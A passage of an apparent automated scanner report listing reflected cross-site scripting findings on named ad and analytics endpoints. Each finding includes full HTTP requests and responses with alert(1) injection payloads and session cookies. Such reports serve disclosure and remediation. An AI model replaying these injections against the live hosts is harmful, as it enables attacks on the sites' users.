The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d35cb'%3balert(1)//c971cafb721 was submitted in the template parameter. This input was echoed as d35cb';alert(1)//c971cafb721 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106286435&template=655713d35cb'%3balert(1)//c971cafb721&checklinkstatus=1 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
Referer: http://www201.americanexpress.com/business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0%22%3balert(1)//2536ed24016
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827; fscookies=b64_VcxBDsIwDATA3.QGSozt2Ie8BQWIVA4NiIb-E6Vqa3xbzXrB..AZhPFCKYByRAikLt9aWRoYvX5yfdTvnBjPvYHkt2NxvUin6dmWFBxj3-kPr3epe5hzu09loEY9miNsTRWzMcIuke0PW0EraIWskJVoJR4iYtZGWOUH

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:10 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 10152


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['655713d35cb';alert(1)//c971cafb721'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...

1.67. http://as00.estara.com/as/commonlink.php [urid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/commonlink.php

Issue detail

The value of the urid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6"%3balert(1)//6377ce7bc77 was submitted in the urid parameter. This input was echoed as b46c6";alert(1)//6377ce7bc77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/commonlink.php?accountid=200106286435&template=253566&urid=69799b46c6"%3balert(1)//6377ce7bc77&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1
Host: as00.estara.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fscookies=b64_lY9BDoMgEEVPgzsbGGAGFm666DUatSSaKjaK9y.xVafLEjYv7-8fACmVRHBotK0UeCQDIF1RNyksCZi9z3V8xHWs0FyU9cbK-aArctCWXZ.WShdo8s4vTK8QDxjr1HZhk578mdxgT3rHNjY4DCHvIDeGG8ON5cZyQ9zQaZxjaxt8zdDHZ4nWktIVfJ7dGGxRAAh9rYcwJwFOCfACbvmiJmoDNS3R8Xf1Z69ZU5pi7r0B; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com
Connection: close
Content-Type: application/x-javascript
Content-Length: 34262

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]="
...[SNIP]...
meoutdefault_template"] = "253566";
wv_vars["timeout253566_state"] = "on";
wv_vars["timeout253566_template"] = "253566";
wv_vars["timeout253566_urid"] = "69799b46c6";alert(1)//6377ce7bc77";
wv_vars["timeout253566_timeoutms"] = "0";
wv_vars["timeout253566_closems"] = "0";
wv_vars["timeout253566_resetmouse"] = "false";
wv_vars["timeout253566_resetkeyboard"] = "false";
wv_var
...[SNIP]...

1.68. http://as00.estara.com/as/commonlink.php [urid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/commonlink.php

Issue detail

The value of the urid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62faa'%3balert(1)//57357bc1d12 was submitted in the urid parameter. This input was echoed as 62faa';alert(1)//57357bc1d12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/commonlink.php?accountid=200106286435&template=253566&urid=6979962faa'%3balert(1)//57357bc1d12&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1
Host: as00.estara.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fscookies=b64_lY9BDsIgEEVPQ3caGJgZWLBx4TUMVYyNLTUV729TtY5LCZuX9-8PgNZGE3hyFqOBQOwAtG9SW-O9grCHKZVTeQyR3NZgcKg-h3wzB3Fz6eo92obcvPML4y2XFYZUj5e8yMDhm1zgkwxebCywGibZIWmcNE4alAalYWn4a7wXawu8Td.V64YQ2dgIr2cTnFNSwMruUp.nqsAbBUHBfr7IFrk9mpOB9e-mz177qHUsc.8J; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com
Connection: close
Content-Type: application/x-javascript
Content-Length: 34262

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]="
...[SNIP]...
=500;wv_vars["ui_height"]=500;wv_start(wv_argscopy);wv_vars["ui_width"]=prev_ui_width;wv_vars["ui_height"]=prev_ui_height;}setTimeout('eStaraCookieDictionaryDelete(\'estaracookie\', \'rule_action_6979962faa';alert(1)//57357bc1d12\', true, null);', 1000);var wv_available = true;
if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array();
wv_available_vars['253566'] = true;
if (typeof(wv_vars)=="undefined")
...[SNIP]...

1.69. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f8470<script>alert(1)</script>d3eebd4205c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2f8470<script>alert(1)</script>d3eebd4205c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:20 GMT
Date: Thu, 03 Feb 2011 16:08:20 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2f8470<script>alert(1)</script>d3eebd4205c", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.70. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 961a2<script>alert(1)</script>f667e8d66a2 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=9319&c5=&c6=&c10=3209360961a2<script>alert(1)</script>f667e8d66a2&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 18:53:46 GMT
Date: Thu, 03 Feb 2011 18:53:46 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"9319", c5:"", c6:"", c10:"3209360961a2<script>alert(1)</script>f667e8d66a2", c15:"", c16:"", r:""});

1.71. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 78a58<script>alert(1)</script>157d4440e69 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=&c15=78a58<script>alert(1)</script>157d4440e69 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:24 GMT
Date: Thu, 03 Feb 2011 16:08:24 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"78a58<script>alert(1)</script>157d4440e69", c16:"", r:""});

1.72. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 45f85<script>alert(1)</script>5d73e5872e0 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=603578645f85<script>alert(1)</script>5d73e5872e0&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:20 GMT
Date: Thu, 03 Feb 2011 16:08:20 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"603578645f85<script>alert(1)</script>5d73e5872e0", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.73. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c039a<script>alert(1)</script>445d1c22264 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786c039a<script>alert(1)</script>445d1c22264&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:21 GMT
Date: Thu, 03 Feb 2011 16:08:21 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786c039a<script>alert(1)</script>445d1c22264", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.74. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 257a9<script>alert(1)</script>4757a91e5f0 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=257a9<script>alert(1)</script>4757a91e5f0&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:22 GMT
Date: Thu, 03 Feb 2011 16:08:22 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"257a9<script>alert(1)</script>4757a91e5f0", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.75. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1f462<script>alert(1)</script>398a6a54a7c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=1f462<script>alert(1)</script>398a6a54a7c&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:22 GMT
Date: Thu, 03 Feb 2011 16:08:22 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"", c5:"1f462<script>alert(1)</script>398a6a54a7c", c6:"", c10:"", c15:"", c16:"", r:""});

1.76. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6daaf<script>alert(1)</script>1ad5ede9ace was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=6daaf<script>alert(1)</script>1ad5ede9ace&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:23 GMT
Date: Thu, 03 Feb 2011 16:08:23 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"6daaf<script>alert(1)</script>1ad5ede9ace", c10:"", c15:"", c16:"", r:""});

1.77. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71024'%3balert(1)//daafc6b74fc was submitted in the admeld_adprovider_id parameter. This input was echoed as 71024';alert(1)//daafc6b74fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=871024'%3balert(1)//daafc6b74fc&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:17 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Thu, 03 Feb 2011 18:54:17 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=871024';alert(1)//daafc6b74fc&external_user_id=gFEcJzqCjXJj&_segment=2%7CgFEcJzqCjXJj%7C"/>');

1.78. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad9f'%3balert(1)//03ee31b5e06 was submitted in the admeld_callback parameter. This input was echoed as 9ad9f';alert(1)//03ee31b5e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9ad9f'%3balert(1)//03ee31b5e06 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
